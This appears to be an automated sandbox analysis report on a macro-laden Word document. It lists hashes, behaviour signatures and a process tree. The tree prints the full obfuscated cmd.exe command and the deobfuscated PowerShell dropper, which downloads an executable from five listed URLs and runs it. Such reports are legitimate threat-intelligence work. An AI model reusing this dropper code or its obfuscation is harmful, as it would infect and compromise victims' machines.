Analysis

  • max time kernel: 120s
  • max time network: 121s
  • platform: windows7_x64
  • resource: win7-20240508-en
  • resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted: 26/05/2024, 21:49

General

  • Target: 76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
  • Size: 113KB
  • MD5: 76e3f55356e2a30593d436ab0880eff8
  • SHA1: 6b1725b71bf2f01ca5b6b7f4c2b4252c67a6e2b1
  • SHA256: b76296d33b324195937257e98ff545fa525399c3f54ec9ed090e29a09ea87e5e
  • SHA512: 6d4e48af3634cea0c8f729a171c51b65cb8b9755cf173867cf201a6934a771a315cb3540c0bcd5f47a58ca200fa0d05a052fbf1313717debb7ca5ccf192cfa8c
  • SSDEEP: 1536:0TxjwKZ09cB7y9ghN8+mQ90MTT+aU1E0NpFukKH6FH:4xjnB29gb8on+E0NpFEaFH

Score: 10/10

Malware Config

Extracted

  • Language: ps1 (deobfuscated)
  • URLs (exe.dropper):
    • http://baza-shartash.ru/hkqXqT1
    • http://anapapoliv.ru/Sp4na
    • http://shorecrestschools.com/nnQkN
    • http://comicole.com/2HZ
    • http://elartedelaaccion.es/6Hyl

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2620
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 call %] :~-360%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $bio=new-object Net.WebClient;$rnV='http://baza-shartash.ru/hkqXqT1@http://anapapoliv.ru/Sp4na@http://shorecrestschools.com/nnQkN@http://comicole.com/2HZ@http://elartedelaaccion.es/6Hyl'.Split('@');$uqC = '179';$ust=$env:temp+'\'+$uqC+'.exe';foreach($nER in $rnV){try{$bio.DownloadFile($nER, $ust);Start-Process $ust;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2188

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize: 20KB
      MD5: a1820d09706007b1b49d661b51446fc6
      SHA1: b8cdd267a03bf2b9006f076cbf909ddedf86e831
      SHA256: a76718cdc20087ef840d58865ed2720bc5e0c524f4546a389e87fde9391efe2a
      SHA512: 9d002c85b8c8d0d675af1e5eb4e3c7d1fa45d0aabf59615e98701757b188faab843dceadaaa179b15e9c245c2d8333ab404a0f18bdff3fe2ecaebaacbd253f34
